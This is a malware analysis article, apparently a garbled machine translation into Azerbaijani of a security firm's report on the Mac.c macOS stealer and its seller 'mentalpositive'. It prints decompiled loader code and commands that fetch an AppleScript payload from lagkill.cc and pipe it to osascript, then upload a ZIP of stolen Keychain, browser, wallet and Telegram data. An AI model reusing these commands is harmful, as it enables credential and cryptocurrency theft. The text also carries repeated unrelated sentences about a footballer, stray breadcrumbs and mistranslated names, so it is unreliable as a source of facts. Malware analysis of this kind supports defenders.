Mac.c həlakının hikməti böyük bir kampaniyayla başlayır, ya da həlaklıqla başlayır.Bu, darknet forumlarının qürurlu köylərində başlayır, orada ilk dəfə "mentalpositive" adlanan bir qorxudan aktyor ortaya çıxdı və onu digər həlakçılardan uzaqlaşdıran sıra dəlillərlə dikkat çəkdi. "MacPaw"ın siber təhlükəsizlik diviziya, son dörd ayda mentalpozitiv izləyib.Şübhəsiz ki, bu, yeni bir aktyordur ki, bu, macOS malware bazarını istifadə edir və bu, Windows şirkətindən daha az doymuşdur. Aylıq Mac.c yalnız son zamanlar aktiv olsa da, artıq daha böyük, daha tanınmış həlak operasiyalarla yarışır. O, ABŞ-dan çox borc alır və Daha çox URL-lər command-and-control infrastrukturuna daxil olunca, Mac.c macOS istifadəçiləri üçün daha böyük bir yeraltı ekosistemin parçası görünür. Atomik macOS Stealer xəritədə Röya4 “Mental-pozitiv” paylaşılan progress updates və hətta Mac.c builds-da toplanan feedback – tipik olaraq gizli macOS malware geliştirmə dünyasında şaşırtıcı dərəcə açıqlıq. Bu yazıda, Mac.c-nin evrimini izləyirik, mentalpozitiv taktiklərini saxlayırıq və bu həddi aşan həddi Apple platformalarına qarşı daha geniş tehdit sahəsinə necə daxil ola biləcəyimizi araşdırırıq. Marketdə yeni oyunçu Dörd ay öncə, Moonlock Lab ilk dəfə Mac.c həlakının ortaya çıxdığını fark edib və bunu “mentalpositive” adlandırdığı bir istehsalçıya adlandırıb. “MentalPositive” yeni trendləri dəyişir: müxtəlif kampaniyalarda istifadə etmək üçün modular architektura, inkişaf etdirilmiş gizlilik teknikaları və daha kompleks komand-and-control (C2) infrastrukturları. However, the target profile and data exfiltration scope of mentalpositive’s Mac.c stand out. It harvests iCloud Keychain credentials, browser-stored passwords, crypto wallets, system metadata, and even files from specific locations on macOS — all using credentials obtained through phishing. By relying on standard system APIs and staged communication methods, it evades many traditional endpoint defences. İnşaat Public VVD - Hollandiyada futbolçu bu adla tanımır, orada VVD daha çox mərkəz-sağı təmsilən edən siyasi partiyanın adının qısaltması kimi bilinir - artıq sorğu-suala ehtiyacı olmayan ulduzdu. VVD - Hollandiyada futbolçu bu adla tanımır, orada VVD daha çox mərkəz-sağı təmsilən edən siyasi partiyanın adının qısaltması kimi bilinir - artıq sorğu-suala ehtiyacı olmayan ulduzdu. Aşağıdaki ekran görüntüləri yeni funksiyaların bildirildiyi kimi forumun mesajlarının zamanla necə dəyişdiyini göstərir.Orijinal mesajlar rus dilində yazılmışdıqdan, hər birinə kısa bir izah edirik.İlk ekran görüntüləri ayda 1500 dollarlıq cərimə güncelleməsinə abonement göstərən bir əvvəlki reklamı göstərir. Daha sonra, "mentalpositive" Mac.c xüsusiyyətlərinin ayrıntılı bir təsvirini paylaşdılar.Onlara görə, ən gözəllikli güncellemələr: orijinal "Ledger Live" appunu yerləşdirmək, dosyanın binary boyutunu azaldırmaq (şəriət analizi ilə daha sürətli və potansiyel olaraq daha az tespit edilə biləcək artefaktlar üçün) və administrator panelinin optimizasiyası. Bu kontekstdə, bir panel, “mentalpositive” müştərilərinin, “Mac.c” həddi aşanlarının satın alanları üçün bir web-based interfeisdir. VVD - Hollandiyada futbolçu bu adla tanımır, orada VVD daha çox mərkəz-sağı təmsilən edən siyasi partiyanın adının qısaltması kimi bilinir - artıq sorğu-suala ehtiyacı olmayan ulduzdu. Tox və Jabber telegramı Son olaraq, yazma vaxtında ən sonuncu yazı daha çox güncellemələr nümayiş etdirir. Bunlar XProtect-i sıfırdan təkmilləşdirmək, dəstəklənən browserlərin genişləndirilmiş listası, kontrol panelindən file grabber aktivasiyası, və ən məşhur olaraq phishing üçün ayrı bir modül Trezor semen sözləri kimi var olan Ledger Live moduluna bənzəyir, bu yeni xüsusiyyət 1000 dollarlıq bir dəfə ödəmək üçün hazırdır. AMOS ilə bənzərlər Interesant olaraq, konkurent həlakların arxasında olan bəzi geliştiricilər Mac.c kodunun orijinalliyini şübhəyə düşdü və bu, tanınmış Atomic macOS Stealer-in modifikasiya edilmiş versiyası ola bilər. Moonlock Lab hər ikisinin ən yeni payloadsını analiz etdi və əhatə etdi. “MentalPositive” tərəfindən təqdim olunan “MentalPositive” kodunun iki hissəsi bir-birinə bölünsə də, bu, ya doğrudan kod borclanmasına, ya da paylaşılan orijinalara göstəricidir. Son xəbərlərimizdən biri (Qırmızı rəngdə işarə edilir) AMOS Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə İlk dəfə Bakıya gəldi: 2025-06-19 20:18:55 ' (Görüntülər yeşil rəngdə işarə olunur) mentalpositive Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə İlk dəfə Bakıya gəldi: 2025-07-01 15:41:49 Mac.c və Atomic macOS Stealer arasındakı funksiya düyməsi kodunun çoxsaylı yenidən istifadəini ortaya qoyur.Bir neçə durumda, funksiyalar sözlü olaraq kopyalanmış və ya minimal dəyişikliklər ilə kopyalanmış görünür. Mac OS X sistemində bütünlüklü məlumat çalmaq üçün hazırlanmış bir xüsusiyyət seti paylaşıb.Bu xüsusiyyətlər hər iki durumda native macOS alətləri və skriptimizlə işləyir, dış bağımlılıqları azaldır və qaçışları artırır.Aşağıdaki tablo bu paylaşılan xüsusiyyətləri təsvir edir: AMOS-un paylaşılan internallara baxmayaraq, həssaslıq, modularlıq və hədəfləndirmədə böyük uğurlar gətirir.Aşağıdaki tablo hər bir həlak üçün özəl xüsusiyyətləri göstərir: Mac.c kompakt, non-persistent AppleScript-based stealer kimi işləyir, Atomic macOS Stealer isə eyni dizayn filosofiyasının daha ilkin, persistent və modular tehditini göstərir. “MentalPositive” vasitəsi daha yeni olsa da, tamamilə orijinal deyil – və AMOS günümüzdə gözləyən daha qüvvətli və təhlükəli həlak variantdır. Mac.c Stealer necə işləyir Əvvəllər bu sözlərdə O gündən bu yana, onların iş alanı dəyişmədi: https://lagkill[.]cc. O, mağdurları izləmək və bir neçə exfiltration prosedürləri üçün istifadə edilən PHP dosyalarını evlənir. 'mentalpositive' “Moonlock Lab” xəbər verir ki, Bu alanın bir çox Mach-O dosyaları ilə əlaqəsi vardır, lakin iş prosesini iki aşama bölüşə bilər: Mach-O başlanğıcı executable və AppleScript payload. 1-ci aşama: Mach-O başlanğıcı 2013-cü ildə aparılmış arxeoloji tədqiqat işləri burada 120 kv.metrlik ərazidə yaşayış yerinin qalığının olduğunu söyləməyə əsas verir (1). undefined8 entry(void) { pid_t pVar1; int res; char cmd [1024]; char id [56]; undefined7 url_C2; undefined4 uStack_29; long local_20; local_20 = *(long *)PTR____stack_chk_guard_100001008; pVar1 = _fork(); if (-1 < pVar1) { if (pVar1 != 0) { LAB_100000e59: if (*(long *)PTR____stack_chk_guard_100001008 == local_20) { return 0; } ___stack_chk_fail(); } pVar1 = _setsid(); if (-1 < pVar1) { _freopen("/dev/null","r",*(FILE **)PTR____stdinp_100001018); _freopen("/dev/null","w",*(FILE **)PTR____stdoutp_100001020); _freopen("/dev/null","w",*(FILE **)PTR____stderrp_100001010); /* SandBox protection */ _system("killall Terminal"); /* Create C2: lagkill.cc */ url_C2 = 0x6c6c696b67616c; uStack_29 = 0x63632e; builtin_strncpy(id + 0x20,"3f2ffd13c8",0xb); builtin_strncpy(id + 0x10,"592960231c11198d",0x10); builtin_strncpy(id,"17508488681a0237",0x10); /* Run upload and run applescript stealer logic: curl -s https://lagkill.cc/src.php?txd=17508488681a0237592960231c11198d3f2ffd13c8 | osascript */ _snprintf(cmd,0x400,"curl -s https://%s/src.php?txd=%s | osascript"); res = _system(cmd); if (res == 0) { /* Run upload to lagkill.cc*/ _snprintf(cmd,0x400, "curl -X POST -H \"cl: 0\" --max-time 300 -F \"file=@/tmp/osalogging.zip\" -F \"bu ildtxd=%s\" https://%s/" ,id,&url_C2); res = _system(cmd); if (res == 0) goto LAB_100000e59; } } } _exit(1); } Mac.c entry point (entry()) bu prosesdən başlayır və setid( vasitəsilə yeni bir sessiya yaratır, bu da effektiv olaraq özünü daemonize edir. VVD - Hollandiyada futbolçu bu adla tanımır, orada VVD daha çox mərkəz-sağı təmsilən edən siyasi partiyanın adının qısaltması kimi bilinir - artıq sorğu-suala ehtiyacı olmayan ulduzdu. VVD - Hollandiyada futbolçu bu adla tanımır, orada VVD daha çox mərkəz-sağı təmsilən edən siyasi partiyanın adının qısaltması kimi bilinir - artıq sorğu-suala ehtiyacı olmayan ulduzdu. Bu aşamada əsas əməl bir AppleScripts quraşdırmaq və sürətləndirməkdir.Bu, payloadı yükləmək və dərhal sürətləndirmək üçün zəncirli curl və osascript ilə başa çatır: curl -s https://lagkill[.]cc/src.php?txd=<victim_id> | osascript Bu metod hücumçunun yüklü yükü modifikasiya etmədən dinamik şəkildə yeniləməsinə imkan verir, indirect execution yolundan ötrü atributlaşdırma daha çətin olur. "AppleScript"in (mümkün ki, lokal data çalınması olan) sürətlənməsindən sonra, yüklənənicilər bir ZIP arşivini tamamilə C2 serverinə qaytarmağa başlayır: curl -X POST -H "cl: 0" --max-time 300 -F "file=@/tmp/osalogging.zip" -F "buildtxd=<victim_id>" https://lagkill[.]cc/ Bu yükləmə özəlləşdirilmiş başlıqlar (cl: 0) və daha yavaş sistemlərə uyğunlaşdırmaq üçün cütlüyüzü vaxtı ilə göndərilir, bu, operasiya stabilliyi üçün dikkatli diqqət göstərən göstəricidir. İkinci aşama: AppleScript payload Mac.c həddi aşan ikinci aşama real zərər başladığı yerdir. AppleScript faydalı yükü native macOS scripting imkanlarını geniş bir rütbə həddi aşmaq üçün silahlandırır. Aşağıda, ikinci etapda payload taktikasını kategoriya ilə bölüşürük. Credential theft & CLI abuse VVD - Hollandiyada futbolçu bu adla tanımır, orada VVD daha çox mərkəz-sağı təmsil edən siyasi partiyanın adının qısaltması kimi bilinir - artıq sorğu-suala ehtiyacı olmayan ulduzdu. Daha sonra, Google Chrome və Chromium vasitəsilə istifadə olunan proqramlara spesifik olaraq istifadə edərək, Keychain-dən kaydedilmiş kimlikləri çıxartmaq üçün güvenlik CLI proqramını çağırır. İstehsal ediləcək data /tmp/<random>/Password hesabına yazılır. Bu phishing taktikası, istifadəçilərin skepticizəsini keçirmək üçün yerli güvən və tanıdanan macOS interfeislərini istifadə edir. Browser and extensions data theft Chrome, Edge, Brave və Yandex də var. Ekstrakt edilmiş dosyalar: login data, cookies, web data, IndexedDB depolama. Son olaraq, skript, MetaMask, Phantom və Binance Wallet kimi tanınmış kripto cüzdan uzantılarının yüzlərini itirir və lokal depolama dosyalarını və ya sessiya artefaktlarını çəkir. Bütün browser-related loot-lar /tmp/<random>/Browsers/ altındadır. Hot wallet and crypto app harvesting Payload-da popüler desktop kripto cüzdanların varlığına baxılır, bunların arasında: Elektrik Ekspozisiya Coğrafiya Atomik Monarxiya Wasabi Ledger canlı Cüzdan dosyaları və konfigürasiya databasları (yani, LevelDB direktoryaları) /tmp/<random>/Cryptowallets/ olaraq kopyalanır. Bu, açıq-aşkar finansal motivasiya göstərir, macOS-ın kripto entuziasta istifadəçi bazasına yönəldilir. File-grabber and its logic İnformasiya sistemini minimallaşdırmaq üçün, sistem aşağıdakilərlə işləyir: Bu sistem istifadəçinin Desktop, Documents və Downloads dosyalarını aradan qaldırır. Filtrlər yüksək qiymətli fail türləri üçün: .wallet, .seed, .txt, .keys, .pdf, .docx. Dosya boyundakı limit ~10 MB təşkil edir. Bu metod düşük gürültü, yüksək sinyallərə, potansiyal soyuq cümlələr, qaytarma anahtarları və həddi aşan PDF-lərə üstünlük verir. Collection of messaging and app artifacts Mac.c tdata folderunu kopyalaşır, bu, aktiv sessiya tokenləri və ya cahed mesajları (Telegram ilə bağlı olanlar) içə bilər. Binance və Ton Keeper proqramlarının konfigürasiyası dosyaları da kopyalanır, cüzdan istifadə, login modelləri və ya depolanan anahtarları incə edir. System_profiler-in hardver, macOS və ekran verileri toplamaq üçün istifadə edilməsi. Bu geniş söhbət, yalnız varlıqları filtr etmək deyil, istifadəçinin kontekstini yeniləmək niyyətini göstərir. Archiving and exfiltration Bütün toplanan məlumatlar strukturlu bir sürətli direktoryaya /tmp/<random>/. Digto -c -k, macOS native archiving tool istifadə edir, bütün direktoryum /tmp/osalogging.zip olaraq zipləşdirilir. Artıq bir neçə ildir ki, bu problemlər həll olunmayıb, bir neçə ildir ki, bu problemlər həll olunmayacaq. Bu gizli-fokuslu, efemeral dizayn sürətli bir smash-and-grab işləməyə işarə edir, şübhəsiz ki, bir-birinə daxil olmaq üçün və ya daha böyük bir infeksiya zəncirinin bir hissəsi olaraq. Phishing strategiyası “Mentalpositive”in ikinci fəziləsinin payloadında istifadə edilən özellikle aldatıcı bir texnologiya, oyunun izni istədiyi kimi gizlənmiş sahə sistem çağırışını içərir. “Arşivlərimizi xilas etmək üçün” İntihar edən hekayələr Bundan başqa, bu payloads bir build tag "sözsüz" (ya da, bəzi hallarda, "sözsüz") ilə gəlir, bu spesifik kampaniyaya bağlı enfeksiyaları tanımlamak üçün istifadə ediləcək. Son olaraq, bu kampaniyaya spesifik olaraq quraşdırılan domen innocentwitches[.]topdur. root URL Google-a yönəldirsə, bu da /upload.php yolunu da içərisindədir, bu da tehdit aktyorunun çalınmış məlumatları qəbul etməsinə imkan verir. Sonrakı Mac kompüterləri ortalama istifadəçilər və kripto sahibləri arasında popülerlik artdığında, həddi aşanların yalnız yetkinlikləri deyil, həm də pazar payı və etkisi ilə genişlənəcəyini gözləyirik. Mac.c yalnız bir problem deyil, daha çox professional macOS malware istehsalına yönəldilən trendin bir parçasıdır. pop-up Atomic Stealer-in əsas funksiyalarını və arkitektur elementlərini yeniləyir, lakin macOS həlaklarına yenilik gətirir və onları ayrı bir trajektoriyada qoyur. Biz yeni bir biznes modeli ortaya çıxdığımızı gözləyə bilərik: macOS istifadəçiləri ilə bağlı və daha geniş bir malware-as-a-service sektorundan uzaqlaşan “Stealer-as-a-Service”, “Stealer-as-a-Service”, “Atomic Stealer” daha təhlükəli variantdır, lakin yeni ambisiyalı oyunçuların daha çalınmış və daha yaxından istifadə edilə biləcək “Malware” məhsulunu yaratmaq üçün öz varlığından istifadə etdiyi zaman yalnız bir vaxtdır. IOC https://innocentwitches[.]com/upload.php https://lagkill[.]cc/src.php Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə » Əsas səhifə